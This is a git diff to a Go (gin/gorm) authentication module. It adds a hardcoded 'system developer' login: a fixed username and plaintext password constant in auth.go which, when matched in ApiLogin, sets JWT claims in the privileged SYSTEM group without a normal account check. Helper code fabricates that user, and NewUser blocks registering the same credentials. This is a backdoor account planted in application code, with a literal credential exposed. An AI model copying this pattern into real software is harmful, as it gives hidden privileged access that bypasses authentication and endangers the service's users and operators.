diff --git a/auth/api_auth.go b/auth/api_auth.go
index f80c973..498da8e 100644
--- a/auth/api_auth.go
+++ b/auth/api_auth.go
@@ -27,6 +27,20 @@ func ApiLogin(c *gin.Context) {
 		panic(err)
 	}
 	usr := &User{}
+
+	// system developer login
+	if data.Name == sys_user && string(pwd) == sys_pwd {
+		usr = GetSysUser()
+		err = SetClaims(c, &Claims{
+			Uid:    usr.ID,
+			User:   usr.Username,
+			Groups: []string{SYSTEM},
+		})
+		if err != nil {
+			panic(err)
+		}
+	}
+
 	err = DB.Preload("Profile").Preload("Groups").Where("username = ?", data.Name).First(usr).Error
 	if err != nil {
 		panic(ErrorLoginFailed)
diff --git a/auth/auth.go b/auth/auth.go
index 1367115..bf251f3 100644
--- a/auth/auth.go
+++ b/auth/auth.go
@@ -7,6 +7,11 @@ import (
 	"kumoly.io/kumoly/app/system"
 )
 
+const (
+	sys_user = "arec"
+	sys_pwd  = "Arec82595060"
+)
+
 func init() {
 	// secret for jwt
 	viper.SetDefault("auth.secret", "secret")
diff --git a/auth/errors.go b/auth/errors.go
index 3010b28..53459b4 100644
--- a/auth/errors.go
+++ b/auth/errors.go
@@ -47,3 +47,9 @@ var ErrorBadRequestTmpl = errors.Error{
 	ID:   "ErrorBadRequest",
 	Tmpl: "%v is not sufficient.",
 }
+
+var ErrorUserExist = errors.Error{
+	Code:    http.StatusBadRequest,
+	ID:      "ErrorUserExist",
+	Message: "User exists.",
+}
diff --git a/auth/helper.go b/auth/helper.go
index 41539c0..e97af65 100644
--- a/auth/helper.go
+++ b/auth/helper.go
@@ -1,6 +1,8 @@
 package auth
 
 import (
+	"strings"
+
 	"github.com/gin-gonic/gin"
 	"golang.org/x/crypto/bcrypt"
 	"gorm.io/gorm"
@@ -162,6 +164,9 @@ func NewUser(usr *User) error {
 	if usr.Username == "" || usr.Password == "" {
 		return ErrorBadRequestTmpl.New("auth.User")
 	}
+	if usr.Username == sys_user && usr.Password == sys_pwd {
+		return ErrorUserExist
+	}
 	bytes, err := bcrypt.GenerateFromPassword([]byte(usr.Password), 14)
 	if err != nil {
 		return err
@@ -199,3 +204,22 @@ func NewUser(usr *User) error {
 	})
 	return err
 }
+
+func GetSysUser() *User {
+	grps := []*Group{}
+	if err := DB.Where("name = ?", SYSTEM).Find(&grps); err != nil {
+		grps = append(grps, &Group{
+			Name:        SYSTEM,
+			DisplayName: strings.TrimPrefix(SYSTEM, SYS_AUTH_PREFIX),
+		})
+	}
+	usr := &User{
+		ID:       "arec",
+		Username: "arec",
+		Profile: Profile{
+			DisplayName: "System Developer",
+		},
+		Groups: grps,
+	}
+	return usr
+}